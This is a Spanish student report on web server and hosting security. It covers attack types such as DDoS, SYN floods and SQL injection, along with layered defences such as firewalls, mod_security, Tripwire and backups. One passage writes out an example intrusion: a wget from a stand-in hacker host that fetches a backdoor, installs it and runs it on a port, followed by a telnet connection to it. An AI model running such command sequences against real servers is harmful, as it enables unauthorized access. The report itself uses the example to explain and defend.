seguridad en servidores web y hosting

8/9/2019 Seguridad en servidores web y hosting

1/30

Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting

Pgina 1 de 30

TCP IP / Profesor Juan Olivares

SEGURIDAD EN

SERVIDORES WEB Y

HOSTING

Alumnos:

Heine Vargas

Pablo Carmona

Luis Sanhueza

Christian Cuevas

Carrera:

Gestin y Soporte de Redes 3 Semestre.


2/30


Pgina 2 de 30

Introduccin

En los ltimos aos la evolucin, y la posterior innovacin de la tecnologa ha generado grandes

avances en todos los mbitos. Las comunicaciones han sido las de mayor desarrollo, especialmente

el desarrollo de Internet.

Internet est presente en nuestras vidas y en nuestras costumbres, en la forma de buscar

informacin, de entretenernos, de comunicarnos y por supuesto, ha hecho que aparezcan nuevas

formas de comprar y vender bienes.

Desde el comunicarse por Messenger o comunicarse va Skype, hasta el revisar la cuenta

corriente bancaria mediante Internet, el uso de la red ha ido ocupando un lugar en la vida de cada

persona.

Estos cambios conllevan grandes beneficios no slo para las personas, tambin para las

empresas que han encontrado grandes oportunidades en los desarrollos de las comunicaciones.

Estas tecnologas estn al alcance tanto de las grandes empresas como de las pequeas. Cualquiera

de estos avances puede estar al alcance de otras empresas o potenciales clientes dispersos

alrededor del mundo.

De esta manera, se han desarrollado un gran nmero de operaciones comerciales novedosas.

Pero as como crecen los beneficios, esta nueva realidad presenta un desafo para las autoridades

fiscales, ya que no es tarea fcil crear un sistema legal-impositivo adecuado a los nuevos tipos de

comercio.

Y como sucede en Chile y el resto del planeta, a medida de que las medidas de seguridad se

van optimizando, la delincuencia va sofisticando cada vez ms sus mtodos de intrusin e infiltracin

en los sistemas.

Lo cual, requiere de una retroalimentacin constante, mantenerse informado, y de este modo,

estar preparado ante un inminente ataque.

El comercio electrnico va creciendo cada da, ya que es una forma cmoda y rpida de adquirir

lo que necesitemos sin movernos de nuestra casa.


3/30


Pgina 3 de 30

Objetivos

El objetivo general que tiene el presente trabajo es el presentar un trabajo bien constituido

sobre la seguridad en servidores y alojamiento Web, explicando una serie de conceptos

relacionados al tema, comenzando por definir los dispositivos en los cuales se est enfocando

el concepto, las vulnerabilidades y medidas, en lo que respecta a la seguridad.

Los objetivos especficos del presente trabajo son:

1.- Que el trabajo permita identificar las vulnerabilidades comunes en los que respecta a la

seguridad de servidores Web y hosting.

2.- Presentar ante la autoridad evaluadora un trabajo bien constituido, el cual se encuentre bien

distribuido, con un esquema ordenado.

3.- Que los alumnos realizadores del trabajo aprendan los conceptos tratados, y stos puedan

ser aplicados en el ramo de protocolos TCP-IP.


4/30


Pgina 4 de 30

Servidor Web

Qu es un servidor Web?

Bsicamente, un servidor Web sirve contenido esttico a un navegador, carga un archivo y lo sirve a

travs de la red al navegador de un usuario. Este intercambio es mediado por el navegador y el

servidor que hablan el uno con el otro mediante HTTP.

Se pueden utilizar varias tecnologas en el servidor para aumentar su potencia ms all de su

capacidad de entregar pginas HTML; stas incluyen scripts CGI, seguridad SSL y pginas activas

del servidor (ASP).

Los Servidores almacenan informacin en forma de pginas Web y a travs del

Protocolo HTTP lo entregan a peticin de los clientes (navegadores Web) en formato HTML.

Servidor Web


5/30


Pgina 5 de 30

Funcionamiento

El Servidor Web se ejecuta en un ordenador mantenindose a la espera de peticiones por parte de un

cliente (un navegador Web) y que responde a estas peticiones adecuadamente, mediante una pgina

Webque se exhibir en el navegador o mostrando el respectivo mensaje si se detect algn error. A

modo de ejemplo, al teclear www.wikipedia.org (http://www.wikipedia.org) en nuestro navegador, ste

realiza una peticin HTTP al servidor de dicha direccin. El servidor responde al cliente enviando el

cdigo HTML de la pgina; el cliente, una vez recibido el cdigo, lo interpreta y lo exhibe en pantalla.

Funcionamiento de un servidor Web

Como vemos con este ejemplo, el cliente es el encargado de interpretar el cdigo HTML, es decir, de

mostrar las fuentes, los colores y la disposicin de los textos y objetos de la pgina; el servidor tanslo se limita a transferir el cdigo de la pgina sin llevar a cabo ninguna interpretacin de la misma.

Adems de la transferencia de cdigo HTML, los Servidores Web pueden entregar aplicaciones Web.

stas son porciones de cdigo que se ejecutan cuando se realizan ciertas peticiones o respuestas

HTTP. Hay que distinguir

entre:

Aplicaciones en el lado del cliente: el cliente Web es el encargado de ejecutarlas en la mquina delusuario.

Son las aplicaciones tipo Java "applets" o Javascript: el servidor proporciona el cdigo de las

aplicaciones al cliente y ste, mediante el navegador, las ejecuta. Es necesario, por tanto, que el

cliente disponga de un navegador con capacidad para ejecutar aplicaciones (tambin llamadas


6/30


Pgina 6 de 30

scripts). Comnmente, los navegadores permiten ejecutar aplicaciones escritas en lenguajejavascript

yjava, aunque pueden aadirse ms lenguajes mediante el uso de plugins.

Aplicaciones en el lado del servidor: el servidor Web ejecuta la aplicacin; sta, una vez ejecutada,

genera cierto cdigo HTML; el servidor toma este cdigo recin creado y lo enva al cliente por medio

del protocolo HTTP.

Las aplicaciones de servidor muchas veces suelen ser la mejor opcin para realizar aplicaciones Web.

La razn es

que, al ejecutarse sta en el servidor y no en la mquina del cliente, ste no necesita ninguna

capacidad aadida, como s ocurre en el caso de querer ejecutar aplicaciones javascript o java. As

pues, cualquier cliente dotado de un navegador Web bsico puede utilizar este tipo de aplicaciones.

El hecho de que HTTP y HTML estn ntimamente ligados no debe dar lugar a confundir ambos

trminos. HTML es un lenguaje de marcas y HTTP es un protocolo.

Servidor Web Local

Protocolo Cliente-Servidor.-

Instalar un servidor Web en nuestro PC nos permitir, entre otras cosas, poder montar nuestra propia

pgina Web sin necesidad de contratar hosting, probar nuestros desarrollos va local, acceder a los

archivos de nuestro equipo desde un PC remoto (aunque para esto existen otras opciones, como

utilizar un servidor FTP) o utilizar alguno de los programas basados en Web tan interesantes que

estn viendo la luz ltimamente. El problema de usar nuestro

ordenador como servidor Web es que conviene tenerlo encendido permanentemente (para que est

accesible de forma continua como la mayora de los sitios webs), con el consiguiente coste debido al

consumo de electricidad

(Conviene tener en cuenta que hay alojamientos Web gratuitos, incluso sin publicidad y con

interesantes funciones).

Software

Algunos servidores Web importantes son:

Apache, IIS, Cherokee

Otros servidores, ms simples pero ms rpidos, son:

Lighttpd y thttpd


7/30


Pgina 7 de 30

Web Hosting

Qu es Web Hosting?

Web Hosting es la renta de espacio en un servidor de Internet para colocar pginas Web. De

esta manera no hay que preocuparse por comprar un servidor que tiene que estar conectado 24 horas

al da, configurarlo, contratar personal especializado, etc.

Imagen relativa al alojamiento Web.-

Un servicio de Web hosting, es el que presta una empresa que provee espacio paraalojamiento de pginas Web. Las empresas de alojamiento (hosting) tienen sistemas que actan

como servidores Web (hosts) o han comprado espacio en un servidor de una tercera empresa. Las

empresas de hosting venden espacio a sus clientes en su servidor, los cuales luego, alojan los

archivos, grficos y otros relativos a sus pginas Web, desde donde pueden ser vistos en la World

Wide Web. Los servidores de las empresas host estn conectadas al WWW las 24 horas del da todo

el ao, para que cualquiera pueda tener acceso a una determinada pgina Web, en cualquier

momento con solo ingresar su direccin URL.

La mayora de empresas host, ofrecen el servicio de alojamiento a sus clientes por una tarifa

mensual, trimestral o anual. Los servicios de hosting bsicos pueden variar en lo que ofrecen, pero la

mayora ofrecen ms o menos lo mismo, con programas para principiantes a tarifas muy bajas. Los

servicios de hosting pueden costar ms debido a que se contrata mayor espacio de alojamiento,

cuentas adicionales de correo, y otros servicios ms complejos, como carritos de compra en lnea y

comercio electrnico.


8/30


Pgina 8 de 30

Servidor seguro en el comercio electrnico en un website

Con un servidor seguro la informacin transmitida entre su website y el visitante es codificada,

de manera que si alguien logra interceptar la transmisin le ser muy difcil descifrar los nmeros de

tarjeta de crdito y dems datos, por lo que no podra utilizarlos contra la empresa y sus clientes,

generando la confianza necesaria para que compren.

Certificado de un servidor seguro

Con un certificado los visitantes de la website estarn seguros de que estn conectados a su

website de manera segura porque con el certificado todos los datos enviados entre el visitante y su

website son codificados.

Firma digital

La firma digital hace referencia, en la transmisin de mensajes telemticos y en la gestin

de documentos electrnicos, a un mtodo criptogrfico que asocia la identidadde una persona o de

un equipo informtico al mensaje o documento. En funcin del tipo de firma, puede, adems, asegurar

la integridaddel documento o mensaje.

La firma electrnica, como la firma holgrafa (autgrafa, manuscrita), puede vincularse a un

documento para identificar al autor, para sealar conformidad (o disconformidad) con el contenido,

para indicar que se ha ledo y, en su defecto mostrar el tipo de firma y garantizar que no se pueda

modificar su contenido.

HTTP y HTTPS, representados con sus respectivas pilas de protocolos.


9/30


Pgina 9 de 30

Formato de la firma electrnica

Regulaciones en diferentes pases

El marco comn de firma electrnica de la Unin Europea

El mercado interior de la Unin Europea implica un espacio sin fronteras interiores en el que est

garantizada la libre circulacin de mercancas. Deben satisfacerse los requisitos esenciales

especficos de los productos de firma electrnica a fin de garantizar la libre circulacin en el mercado

interior y fomentar la confianza en la firma electrnica.

En ese sentido la Directiva 1999/93/CE sienta un marco comn para la firma electrnica que se

concret con la transposicin de la Directiva a las diferentes legislaciones nacionales de los pases

miembros.

Ley sobre firma electrnica en Chile

Esta ley fue publicada el 15 de septiembre del ao 2003 por el Ministerio Secretara General de la

Presidencia, la Ley 19.799 sobre Documentos Electrnicos, Firma Electrnica y Servicios de

Certificacin de dicha firma, reconoce que los rganos del Estado podrn ejecutar o realizar actos,

celebrar contratos y expedir cualquier documento, dentro de su mbito de competencia,suscribindolos por medio de firma electrnica simple. Igualmente seala que estos actos, contratos y

documentos, suscritos mediante firma electrnica, sern vlidos de la misma manera y producirn los

mismos efectos que los expedidos en soporte de papel.


10/30


Pgina 10 de 30

Ataques al servidor Web

Vulnerabilidad de los servicios en la Web

Los primeros ataques a la red aprovecharon las vulnerabilidades relacionadas con la implementacin

de conjuntos de protocolos TCP/IP. Al corregirlas gradualmente, los ataques se dirigieron a las capas

de aplicaciones y a la Web en particular, ya que la mayora de las empresas abrieron sus sistemas de

firewall al trfico en Internet.

El protocolo HTTP (o HTTPS) representa el estndar que posibilita la transferencia de pginas Web a

travs de un sistema de solicitud y respuesta.

Internet, que se utiliza principalmente para transferir pginas Web estticas, se ha convertido

rpidamente en una herramienta interactiva que permite proporcionar servicios en l nea. El trmino

"aplicacin Web" se refiere a cualquier aplicacin a cuya interfaz se pueda acceder en la Web desde

un simple navegador. Hoy en da, el protocolo HTTP, la base para una determinada cantidad de

tecnologas (SOAP, Javascript, XML-RPC, etc.), juega un indudable papel estratgico en la seguridad

de sistemas de informacin.

Debido a que los servidores Web estn cada vez ms protegidos, los ataques estn dirigiendo su

atencin al aprovechamiento de las fallas de las aplicaciones Web.

Como tal, la seguridad de los servicios de Internet debe tenerse en cuenta al momento del diseo y

desarrollo.

Algunas vulnerabilidades ilustradas durante el trfico cliente-servidor


11/30


Pgina 11 de 30

Tipos de vulnerabilidades

Las vulnerabilidades de aplicaciones Web se pueden clasificar de la siguiente manera:

Vulnerabilidades del servidor Web. Este tipo es cada vez ms atpico ya que la mayora de los

Desarrolladores de servidores Web han aumentado su seguridad con los aos;

Manipulacin de URL, incluida la modificacin manual de parmetros de URL para modificar elcomportamiento esperado del servidor Web;

Aprovechamiento de las debilidades de los identificadores de sesin y sistemas de autenticacin;

Inyeccin de cdigo HTML y Secuencia de comandos entre sitios;

Inyeccin de comandos SQL.

La verificacin necesaria de los datos de entrada

El protocolo HTTP se utiliza por naturaleza para administrar las solicitudes, es decir, para recibir los

datos de

entrada y enviar los datos de retorno. Los datos se pueden enviar de varias maneras:La URL de la pgina Web

En encabezados HTTP

En el cuerpo de la solicitud (solicitud POST)

A travs de una cookie

En general, la idea bsica a tener en cuenta durante el proceso de desarrollo es que nunca se debe

confiar en los datos enviados por el cliente.

Casi todas las vulnerabilidades de los servicios Web estn vinculadas a la negligencia por parte de los

diseadores, quienes no han verificado el formato de los datos ingresados por los usuarios.


12/30


Pgina 12 de 30

Impacto de los ataques en la Web

Los ataques a las aplicaciones Web siempre son dainos ya que proporcionan una mala imagen a la

empresa.

Un ataque exitoso puede provocar cualquiera de las siguientes consecuencias:

Desfiguracin de la pgina Web;

Robo de informacin;

Modificacin de datos, y en particular la modificacin de datos personales de los usuarios;Intrusin en el servidor Web.


13/30


Pgina 13 de 30

Amenazas contra los servidores Web

Obtencin usuario y clave con diccionarios o fuerza bruta (http://www.hoobie.net/brutus/)

Hoy da, hay un enorme nmero de amenazas a las que hace frente a un servidor Web, muchas de

ellas dependen del uso, el sistema operativo y el ambiente que se haya configurado en el sistema

mismo. Estos son algunos de los ataques ms genricos que su "pobre" servidor puede enfrentar.

Negacin del servicio

Un ataque por negacin del servicio (DOS) es uno de los ataques de la vieja escuela

que el servidor puede enfrentar. El ataque es muy simple, y hoy en da es realizado por aquellos

individuos conocidos comnmente como script kiddies, con un perfil de habilidades tcnicas bajo. En

resumen, un ataque DOS es un ataque en el cual un sistema ataca otro con la intencin de consumir

todos los recursos del sistema (tales como ancho de banda o ciclos del procesador), no dejando nada

libre para peticiones legtimas. Generalmente, estos ataques se han relegado a la categora de

molestias, pero no por ello hay razn para bajar la guardia ante ellos, aunque hay un montn de cosas

ms para mantenerse despierto.

Negacin del servicio distribuida

El ataque por negacin del servicio distribuido (DDoS) es el hermano mayor del ataque DOS y como

tal es ms malo y ms sucio. La meta del ataque DDoS es hacer la misma cosa que el DOS, pero a

una escala mucho ms grande y compleja. En un ataque de DDoS, en vez de un sistema ataque a


14/30


Pgina 14 de 30

otro, un atacante utiliza sistemas mltiples para apuntar un servidor (su servidor), y sistemas mltiples

significa (en algunos casos) no centenares o millares, sino hasta cientos de millares. Donde el ataque

DOS es tan solo una molestia, un ataque de DDoS puede ser mortal, ya que puede llevar a un

servidor fuera de lnea rpidamente. La buena noticia es que el nivel de habilidad requerido para

contrarrestar un ataque DDoS apagado no es tan

alto.

Algunos de los ataques ms comunes de DDoS incluyen:

Ataques FTP. Un ataque FTP (File Transfer Protocol) se decreta cuando un atacante carga en un

servidor ftp un archivo construido especialmente para hacerlo vulnerable, el efecto es que

alternadamente lo remite a otra localizacin, que es generalmente otro servidor ftp dentro de la

organizacin.

El archivo enviado tpicamente contiene una cierta clase de carga diseada para hacer que el servidor

final haga lo que el atacante desea.

Simulacin ataque Dos Ftp

Ataque de exploracin de puertos. Un ataque de exploracin de puertos se realiza a travs

la exploracin estructurada y sistemtica de un Host. Por ejemplo, alguien puede explorar su servidor

Web con la intencin de encontrar servicios expuestos u otras vulnerabilidades que puedan ser

explotadas. Este ataque puede ser realizado de una manera fcil con cualquier nmero de programas

exploradores de puertos disponibles gratuitamente en Internet.

Tambin es uno de los tipos de ataque ms comunes, pues es tan simple que los pequeos hackers

(script kiddies) los realizan apenas consiguen el nombre de un Host o la direccin IP de un servidor

(sin embargo, tpicamente ellos no saben interpretar los resultados). Tenga esto presente, pues un

atacante con ms habilidades utilizar la exploracin de puertos para descubrir informacin que usar

en un esfuerzo posterior.

Ataque de exploracin de puertos


15/30


Pgina 15 de 30

Ataque de inundacin por ping (Pingflood). Es un ataque simple DDoS en cul una

computadora enva un paquete (ping) a otro sistema con la intencin de descubrir informacin sobre

servicios o sistemas de arriba a abajo. En el extremo inferior, una inundacin por Ping se puede

utilizar para descubrir informacin encubierta, pero en la parte alta los paquetes que son

enviados a una blanco o vctima pueden provocar que el sistema quede fuera de lnea o sufra

retardos. Este es un ataque a la vieja escuela, pero es an muy eficaz, ya que cierto nmero de

sistemas operativos modernos siguen siendo susceptibles a este.

ataque de inundacin por ping (PingFlood)

Ataque "Smurf". Este ataque es similar al ataque de inundacin por ping pero con una astuta

modificacin al proceso. En un ataque Smurf, el comando "ping" se enva a una red intermedia, donde

el efecto se amplifica y se remite a la vctima. As, lo que antes era una sola gota ahora se convierta

en un "tsunami" virtual de trfico. Afortunadamente, este tipo de ataques es raro.

Ataque Smurf


16/30


Pgina 16 de 30

Ataque por inundacin SYN (Synflood). Este ataque requiere un cierto conocimiento del

protocolo TCP/IP -es decir como trabaja el proceso de comunicacin IP-. La manera ms fcil de

explicar este ataque es con una analoga. Este ataque es el equivalente en una red a enviar a alguien

una carta que requiere una respuesta, solamente que la carta utiliza un falso

remitente. As cuando el objetivo enva de vuelta la carta espera una respuesta, pero la respuesta

nunca llega porque de alguna manera entra en un hoyo negro en algn lugar. Suficientes peticiones

SYN al sistema y el atacante puede provocar que se util icen todas las conexiones disponibles en el

sistema, de modo que nada mas pueda fluir a travs de este.

Ataque por inundacin SYM (SynFlood)

Ataque de fragmentacin. En este caso, un atacante utiliza conocimientos avanzados del

protocolo del TCP/IP para romper los paquetes en pedazos o fragmentos ms pequeos, que

puentean la mayora de los sistemas de intrusin-deteccin. En casos extremos, este tipo de ataque

puede causar cadas, bloqueos, reboots, pantallas azules y otro tipo de travesuras.

Afortunadamente, este ataque es difcil de lograr.

uso de Fragmentacin


17/30


Pgina 17 de 30

Ataque SNMP. Estos ataques se disean especficamente para explotar el servicio SNMP, el cual

maneja la red y los dispositivos en ella. Ya que el servicio SNMP se usa para manejar los dispositivos

de la red, al explotar este servicio se puede conseguir inteligencia detallada sobre la estructura de la

red que puede utilizarse ms adelante para otros ataques.

SNMP

Desconfiguracin de la pgina Web

La desconfiguracin de la pgina Web ocurre de vez en cuando. Como su nombre lo indica, este

ataque resulta de una desconfiguracin del sitio, cuando un servidor est incorrectamente

configurado, y un atacante utiliza esta debilidad para modificar pginas bajo cualquier cantidad de

razones, por ejemplo la diversin o promover una causa poltica.

Pagina Web desconfigurada.


18/30


Pgina 18 de 30

Inyeccin SQL

Inyecciones SQL (lenguaje de consulta estructurada), son los ataques realizados contra bases de

datos. En este caso, un atacante utiliza debilidades en el diseo de la base de datos o de la pgina

Web para extraer informacin o ms an, para manipular informacin dentro de la base de datos.

Aunque no es posible en este caso ser ms especficos respecto a cmo quitar este tipo de ataque,

usted puede evitarlo si tiene conocimientos de SQL, los cuales debera tener -si est hospedando una

base de datos en su servidor Web-.

Inyeccin SQL

Codificacin pobre

Cualquier persona que ha sido desarrollador o ha trabajado en tecnologas de la informacin ha visto

los problemas asociados a prcticas descuidadas o perezosas en la codificacin. Una pobrecodificacin puede generar un gran nmero de factores, incluyendo un pobre entrenamiento, nuevos

desarrollos, o una escasa garanta de calidad para una aplicacin. En el mejor de los casos, una

codificacin pobre puede ser no mas que una molestia, donde las funcionalidades de una aplicacin

no trabajen segn lo anunciado; pero en el peor de los casos, las aplicaciones pobremente

codificadas pueden tener "agujeros" de seguridad importantes.


19/30


Pgina 19 de 30

Programacin en PHP.

Cdigos empaquetado (Shrink-wrapped code)

Este problema se relaciona con los anteriores casos de codificacin pobre, pero con una diferencia:

Bsicamente, el problema proviene de la conveniencia de obtener componentes precompilados o

desarrollados de antemano, que se pueden utilizar como bloques para construir aplicaciones propias.

Su desventaja es que los componentes utilizados pueden no haber pasado un proceso de revisin de

su cdigo -tal como el que usted hara-, y su uso puede crear problemas potenciales.

Adicionalmente, no es extrao escuchar por parte de los desarrolladores que realmente "no saben

como analizar el cdigo y entender totalmente lo que est haciendo" como para saber poner en usocomponentes empaquetados. En al menos un caso puedo pensarlo. Estoy enterado de un revelador

caso en el que usando un bloque del cdigo empaquetado para proporcionar un mecanismo de

autentificacin - para una aplicacin que autentificaba usuarios reales-, tambin se enviaban

electrnicamente las mismas credenciales de manera secreta a una tercera persona.


20/30


Pgina 20 de 30

Los dos niveles de ataques a servidores Web

Ataque a sitio de dominio.gov.ar 13/8/2004

Un mal da entramos a nuestro sitio Web, y en lugar de ver nuestra pgina de siempre nos

encontramos con otra portada: "defaced" o "este servidor ha sido hackeado". Una vez confirmado que

realmente es as (que no se trata de un desvo del dominio), debemos identificar en qu nivel ha sido

realizada la intrusin: nivel de aplicacin o nivel de sistema. En uno u otro nivel los riesgos son

distintos, y son distintas las medidas a tomar para corregir el problema.

Una foto del Che Guevara, el smbolo de la anarqua... la cara de un mono... Fido Dido... un paquete

de sopa instantnea... Sea cual fuere la nueva "presentacin" de nuestro sitio Web, lo primero que

debemos hacer (adems de tranquilizarnos frente al estado de shock que producen estas situaciones)

es verificar si el servidor realmente ha sido vulnerado, y que no se trate simplemente de un desvo de

DNS.

Voy a resumir el problema del DNS: el Domain Name System es el responsable de traducir los

nombres de los sitios a las direcciones IP de los servidores donde stos estn alojados. As cuando

escribimos "www.sitioweb.com" el DNS retorna la direccin IP del servidor (como ser

200.40.129.50). Ahora imaginemos que un servidor DNS (hay millones) ha sido engaado, y en lugar

de retornar la direccin IP correcta, nos devuelve la IP de otro server donde se aloja la pgina Web

que vemos en lugar de la nuestra.


21/30


Pgina 21 de 30

A esto se le llama "DNS spoofing", y sus efectos normalmente son locales. Es decir: el fallo lo

experimentan slo las mquinas que se basan (resuelven) en el servidor DNS en cuestin (una

empresa, un ISP, una ciudad). Y el resto del mundo sigue viendo nuestro sitio Web original sin

problemas.

Bien, una vez descartado que se trate de DNS spoofing, y confirmado -IP mediante- que nuestro sitio

Web realmente ha sido modificado, estamos en hora de determinar si el ataque se realiz a nivel de

aplicacin o a nivel de sistema.

Nivel de Sistema

Es el nivel de acceso que representa ms riesgo. Es lo que todo intruso desea lograr en una mquina:

tener el control total de los recursos... aduearse

completamente de la mquina con los mismos privilegios que el propio administrador.

El acceso a nivel de sistema implica el acceso al mismo sistema operativo, en ltima instancia

mediante un terminal remoto.

Estos accesos se logran a travs de algn servicio mal configurado, o de aplicaciones vulnerables que

permitan la ejecucin de cdigo arbitrario en el server. Por ejemplo: si tenemos abierto un servicio

telnet, o un SSH vulnerable, estamos dando al atacante una terminal de acceso para que

simplemente comience a trabajar en su prximo paso que discutiremos en las prximas lneas: la

escalada de privilegios.

Otra posible entrada a un sistema es la explotacin de servicios vulnerables que permitan

desbordamientos de bfers (que nos permitan, an sin tener un terminal, ejecutar comandos en el

sistema operativo).

Consideremos el siguiente caso: un intruso sabe que mediante un sendmail mal configurado, o un

proFTPd u otro software, tiene la posibilidad de ejecutar comandos sobre la mquina... Y esos

comandos pueden ser:

1) wget http://www.sitiohacker.com/backdoor.tar.gz

2) tar -xvzpf ./backdoor.tar.gz

3) cd backdoor

4) ./backdoor -p 10040

En al paso (1) baja de internet un paquete comprimido conteniendo un software de intrusin

(backdoor.tar.gz en nuestro ejemplo). En el paso (2) descomprime el paquete en el directorio actual

(no importa cual sea). En el paso (3) se mueve al directorio que ha sido creado tras descomprimir las

herramientas. Y en el paso (4) ejecuta un comando que pone a funcionar el servicio "backdoor"


22/30


Pgina 22 de 30

escuchando en el puerto TCP 10040. (slo se trata de un ejemplo: las direcciones y los nombres son

ficticios. En la prctica puede haber miles de posibilidades).

Hasta ahora el intruso ha ejecutado estos comandos sin retorno visual: no tiene una pantalla que le

permita ver los resultados de lo que est tecleando, ya que la vulnerabilidad le permite slo enviar los

comandos que llegan al sistema operativo mediante una va alternativa.

Pero ahora el intruso, cmodamente y desde su mquina, puede hacer lo siguiente:

telnet 172.16.100.21 10040

...donde la IP del servidor atacado es 172.16.100.21, y 10040 es el puerto donde el hacker puso a

funcionar su aplicacin "backdoor". Ahora s, el hacker tiene una terminal de acceso a nuestro

sistema. Casi con la comodidad de estar en su propia PC. Pero para tener el control total del servidor

an le hace falta realizar otro trabajo:

Escalada de privilegios En el ejemplo anterior describiendo la forma de realizar un acceso,

todos los comandos que se ejecutaron en el sistema (incluso la ejecucin del programa "backdoor", y

los comandos que a su vez se ejecuten a travs de ste) se harn con los privilegios y permisos que

tenga el programa a travs del cual se accedi al servidor. En caso de haber accedido por una brecha

de proFTPd, seremos el usuario "ftp", o "nobody":

usuarios menores, con privilegios recortados, incapaces de realizar grandes cambios en la

configuracin del servidor.

La "escalada de privilegios" tiene un nombre bien autoexplicativo: consiste en la realizacin de uno o

ms ataques a programas locales mal configurados, y a travs de los mismos ir logrando nuevos

privilegios, hasta tomar el lugar del superusuario root (o wheel en los BSD). Sobre este punto se

pueden escribir decenas de libros, pero su profundizacin est fuera de los objetivos de este artculo.

Quien se haya tomado el trabajo de acceder de esta forma a un servidor, difcilmente sea tan estpido

como para dedicarse a modificar las pginas Web poniendo "servidor hackeado". Por el contrario:

esta categora de intrusos permanece en silencio, tratan de permanecer inadvertidos durante todo el

tiempo posible para as poder sacar el mximo provecho posible de "su nuevo servidor". Tal vez slo

al final, como broche de oro, tome la iniciativa de cambiar la portada del sitio Web (cuando el servidor

no le sirva ms para sus objetivos, o si es descubierto y se da cuenta de que va a ser expulsado).


23/30


Pgina 23 de 30

Nivel de Aplicacin

Los ataques a nivel de aplicacin son aquellos que se realizan explotando vulnerabilidades de

aplicaciones que permitan modificar los datos que la propia aplicacin manipula, pero sin la

posibilidad de ejecucin de comandos sobre el sistema operativo.

Ejemplos: la modificacin o borrado de contenidos en un sistema de gestin de portales, como

phpNuke o Mambo. O la manipulacin de una base de datos SQL mediante un acceso no autorizado

a un phpMyAdmin vulnerable.

En este tipo de ataques el intruso puede cambiar lo que desee en nuestro sitio Web, o en nuestras

bases de datos. Pero no se puede considerar que el servidor est comprometido, ni que el intruso

haya entrado efectivamente en el sistema.

Los ataques a nivel de aplicacin son los ms comunes y visibles (y los ms populares entre los

chicos traviesos aficionados a romper cosas). De modo que el servidor -a pesar de estos ataques-

permanece intacto. La seriedad y la gravedad de estos ataques depende de la importancia de la

aplicacin Web atacada: no es lo mismo un ataque de este tipo en una galera de fotos online, que en

una aplicacin de procesamiento de pagos y transferencias

financieras.

Consideraciones de seguridad en Servidores Web

Medidas Preventivas:Su objetivo es prevenir o dificultar la intrusin ejemplo: Firewalls

Firewall


24/30


Pgina 24 de 30

Medidas Reactivas:Reaccionan ante la amenaza tomando contra medidas ejemplo:

Firewall de aplicaciones, Mod_security, Sistema de deteccin de ataques de fuerza bruta, etc.

Mod Security

Medidas de Deteccin:Ayudan a detectar si una intrusin a ocurrido o est en proceso.

Ejemplo: HIDS como Tripwire, chkrootkit

chkrootkit en linux

Medidas de Recuperacin:Ayudan a recuperar la operabilidad luego de una intrusin

Ejemplo: backups e imgenes de disco.

Al implementar un esquema de seguridad, se debe planear en lneas defensivas, cada lnea refuerza

la anterior, de modo que el fallo o la vulnerabilidad de una lnea no comprometa la

instalacin, piense como el enemigo, monitoree sus logs e investigue cualquier indicio sospechoso.

Backup


25/30


Pgina 25 de 30

Un ejemplo tpico de un esquema defensivo:

Primera lnea

Componente: Software

Objetivo: Mantener nuestro software al da y con sus respectivos parches de seguridad aplicados

Segunda lnea

Componente: Firewall

Objetivo: Reglamentar el trfico de entrada/salida

Ejemplos: APF, Firewalls de hardware, etc.

Un firewall clsico evita que accesos a determinados servicios de nuestro servidor pero no proteger

los servicios que obligatoriamente debemos dejar abiertos en un servidor Web como son: http, mail,

ssh, etc

Tercera lnea

Componente: Sistema de deteccin de ataques de fuerza bruta.

Objetivo: Proteger nuestros puntos de entrada al servidor, ssh, ftp, etc. que un firewall clsico

no protegera.

Ejemplos: BFD

Los hackers saben muy bien que muchos usuarios son descuidados con sus passwords, tambin

saben que muchsima gente usa su mismo login como password, adems existen numerosas

herramientas que facilitan el ataque a servicios como ftp y ssh, estos ataques tratan de ingresas miles

de combinaciones de usuarios y passwords, para tratar de dar con alguna que funcione.

Cuarta lnea

Componente: Firewall de aplicacin.

Objetivo: Proteger nuestras aplicaciones Web de uso malicioso

Ejemplo: mod_security

Muchas aplicaciones Web son inseguras, una no adecuada validacin de variables y formularios

puede ser la puerta de entrada para hacker, los firewalls de aplicaciones protegen nuestras

aplicaciones de uso malicioso.

Quinta lnea

Componente: HIDS activos

Objetivo: Examinar los paquetes entrantes en busca de ataques conocidos

Ejemplo: SNORT

estos sistemas verifican el trfico entrante y lo comparan con patrones de ataque conocidos y

en base a eso pueden tomar acciones.


26/30


Pgina 26 de 30

Sexta lnea

Componente: HIDS pasivos

Objetivo: Detectar intrusiones recientes o en proceso

Ejemplo: Tripwire

La idea bsica detrs de estos sistemas es saber con exactitud si una intrusin ha ocurrido

y saber que partes del sistema fueron modificados, de esta manera podemos planear la recuperacin

y parcheo del sistema

Sptima lnea

BACKUP: Despus de una intrusin, esto es lo nico que le quedar; asegrese de que realizar

peridicamente copias de respaldo y mensualmente haga pruebas de restauracin.

Consejos generales de seguridad:

Proteja su computadora personal tanto como su servidor, de nada vale proteger su

server si un hacker puede robarle su contrasea fcilmente de su computadora.

Revise los logs diariamente;

Investigue cualquier anomala.

Mantngase informado acerca de las ltimas amenazas de seguridad.

Parta de la premisa de que NO existe un servidor impenetrable solo difcil de comprometer.

Seguridad no es instalar paquetes de seguridad en su servidor, es una filosofa de trabajo.

Investigar cualquier Anomala


27/30


Pgina 27 de 30

Otras consideraciones de seguridad, vistas desde otro punto de

vista:

Usar siempre software en su ltima versin release (estable):Esto ya que las

ltimas versiones traen normalmente resueltos problemas de seguridad detectados que podran ser

usados en contra de un servidor.

Instalar solo los servicios necesarios que se van a utilizar: (por ejemplo Servidor

Web o Servidor de base de datos), nunca instalar servicios que no se uti lizarn como servidores de

correo innecesarios y servicios de compartir de archivos entre otros.

Cambiar puertos por defecto: a las aplicaciones comunes que se puedan considerar

vulnerables.

(Ejemplo: MySQL).

Cerrar todos los puertos del servidor que no sean estrictamente necesarios:

normalmente para un servidor Web se requiere el puerto 80, el puerto de correo a utilizar (solo de

requerirse un servicio de correo) y algn puerto para conexin remota al servidor como el 22 para ssh,

el cual se recomienda cambiar.

Instalar un firewall:si se usa linux iptables est perfecto, si se usa windows la versin gratuita de

Zone Alarm es una buena alternativa

No instalar los siguientes servicios en los servidores Web:

Finger

SNMP

Si se desea instalar un FTP, en su lugar usar SFTP.

Mantener constantemente actualizado el software instalado(Incluido el Sistema

Operativo): de esta forma se tienen siempre las versiones de las aplicaciones que tienen corregidos

fallos de seguridad.

No permitir en los accesos SSH el ingreso del usuario Root:solo se podr acceder a

l mediante algn usuario previamente autenticado ejecutando las instrucciones "su" o "sudo -s".


28/30


Pgina 28 de 30

